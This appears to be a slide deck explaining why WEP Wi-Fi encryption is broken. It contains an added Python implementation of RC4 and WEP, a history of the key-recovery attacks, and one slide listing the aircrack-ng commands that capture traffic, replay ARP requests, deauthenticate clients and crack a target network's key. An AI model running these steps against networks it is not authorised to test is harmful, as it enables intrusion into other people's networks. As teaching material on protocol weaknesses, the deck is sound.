Wired Equivalent Privacy (WEP) is an easily broken security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in September 1999, its intention was to provide data confidentiality comparable to that of a traditional wired network.
3. WEP Basics
The first encryption scheme made available for Wi-Fi
Uses the RC4 encryption algorithm
RC4 is a symmetric-key encryption method
Available on all access points
Typically used by home users or manufacturing companies
4. WEP Step 1: Generating Keystream
Diagram: IV + WEP key (64- or 128-bit) -> RC4 algorithm (KSA + PRGA) -> random keystream
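The keystream step above, written out as an added example (not code from the original slides): RC4's KSA and PRGA, the WEP per-packet key formed as IV || WEP key (a 5-byte key gives "64-bit" WEP, a 13-byte key gives "128-bit" WEP once the 24-bit IV is counted), and the frame encryption with a CRC-32 ICV. The sample key and IV are constructed here. The XOR helper at the end illustrates why the IV matters: two frames encrypted under the same IV share the same keystream, so XORing their encrypted bodies cancels the keystream and leaves only the XOR of the plaintexts.

```python
import zlib

IV_LEN = 3                 # WEP IV is 24 bits
IV_SPACE = 1 << (8 * IV_LEN)  # 16,777,216 possible IVs per key


def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: permute S[0..255] under the key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_prga(S: list, n: int) -> bytes:
    """Pseudo-random generation algorithm: emit n keystream bytes from S."""
    S = S[:]          # work on a copy so the scheduled state can be reused
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_keystream(key: bytes, n: int) -> bytes:
    """KSA followed by PRGA: the keystream the slide's diagram produces."""
    return rc4_prga(rc4_ksa(key), n)


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 encryption/decryption: XOR data with the keystream."""
    return bytes(a ^ b for a, b in zip(data, rc4_keystream(key, len(data))))


def wep_per_packet_key(iv: bytes, wep_key: bytes) -> bytes:
    """WEP feeds RC4 the 3-byte IV prepended to the shared key."""
    if len(iv) != IV_LEN or len(wep_key) not in (5, 13):
        raise ValueError("IV must be 3 bytes; WEP key must be 5 or 13 bytes")
    return iv + wep_key


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Build a WEP data body: IV || key-id byte || RC4(plaintext || CRC-32 ICV)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    body = rc4(wep_per_packet_key(iv, wep_key), plaintext + icv)
    return iv + bytes([key_id & 0x03]) + body


def wep_decrypt(wep_key: bytes, frame: bytes) -> bytes:
    """Reverse wep_encrypt and check the ICV; raise on mismatch."""
    iv, body = frame[:IV_LEN], frame[IV_LEN + 1:]
    plain = rc4(wep_per_packet_key(iv, wep_key), body)
    data, icv = plain[:-4], plain[-4:]
    if zlib.crc32(data).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return data


def xor_encrypted_bodies(frame_a: bytes, frame_b: bytes) -> bytes:
    """XOR the encrypted payloads of two frames (IV and key-id byte skipped).
    If both frames used the same IV under the same key, the shared keystream
    cancels and the result equals plaintext_a XOR plaintext_b."""
    a, b = frame_a[IV_LEN + 1:], frame_b[IV_LEN + 1:]
    return bytes(x ^ y for x, y in zip(a, b))


if __name__ == "__main__":
    key = b"ABCDE"                 # constructed 40-bit ("64-bit") WEP key
    iv = b"\x01\x02\x03"           # constructed IV
    f1 = wep_encrypt(key, iv, b"hello world")
    print("frame:", f1.hex())
    print("decrypted:", wep_decrypt(key, f1))
    f2 = wep_encrypt(key, iv, b"HELLO WORLD")   # same IV reused
    print("xor of bodies:", xor_encrypted_bodies(f1, f2).hex())
```

The RC4 core can be checked against the published test vector (key "Key", plaintext "Plaintext" encrypts to bbf316e8d940af0ad3). With only 2^24 IVs per key, a busy access point exhausts the IV space in hours, and many drivers of the era started from IV 0 on every reboot, which is why keystream reuse was a practical rather than theoretical concern.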
8. WEP: Broken Beyond Repair
2001: The insecurity of 802.11, Mobicom, July 2001, N. Borisov
2001: Weaknesses in the key scheduling algorithm of RC4, S. Fluhrer, I. Mantin, A. Shamir, Aug 2001 (FMS)
2004: KoreK improves on the above technique and reduces the complexity of WEP cracking. We now only require around 500,000 packets to break the WEP key.
2005: Andreas Klein introduces more correlations between the RC4 keystream and the key.
2007: PTW extend Andreas Klein's technique to further simplify WEP cracking. Now with just around 60,000-90,000 packets it is possible to break
9. WEP Cracking
Different attacks using different logic
The oldest one is finding "weak IVs", which reveal information about the WEP key
Once you can collect a large number of weak IVs, you can crack the WEP key
Weak IVs are not uniformly distributed in the IV space
A weak IV is key dependent
This is the reason why it takes some time
10. Steps To Crack WEP Using BT5
Put your NIC card in promiscuous mode
# airmon-ng start wlan0
Start sniffing for air traffic
# airodump-ng -w packetCaptured mon0
Do fake authentication attack
# aireplay-ng -1 0 -e SSID -a TargetMac -h MyMac mon0
Run ARP request replay attack
# aireplay-ng -3 -b TargetMac -h MyMac mon0
Deauthenticate to collect more ARP request responses
# aireplay-ng -0 1 -a BSSID -c ClientMAC mon0
Finally, run the cracking tool on the captured packets
# aircrack-ng packetCaptured
11. Solutions
Always use authentication in your wireless network
Use a MAC ACL mechanism to provide layer 2 security.
Switch off your beacon broadcast
Use WPA because it is more secure as compared to WEP
And last but not the least... Do not use WEP!!
12. References
Fluhrer, S., Mantin, I., Shamir, A.: Weaknesses in the key scheduling algorithm of RC4. In: Proceedings of the 4th Annual Workshop on Selected Areas of Cryptography. (2001)
KoreK: http://www.netstumbler.org/f50/chopchopexperimental-wep-attacks-12489/ (2004)
KoreK: http://www.netstumbler.org/f18/nextgeneration-wep-attacks-12277/index3.html (2004)
Tews, E., Weinmann, R.P., Pyshkin, A.: Breaking 104 bit WEP in less than 60 seconds. Cryptology ePrint Archive, Report 2007/120 (2007) http://eprint.iacr.org/
Klein, A.: Attacks on the RC4 stream cipher. Des. Codes Cryptography 48(3) (2008) 269-286
Vivek Ramachandran: http://www.securitytube.com/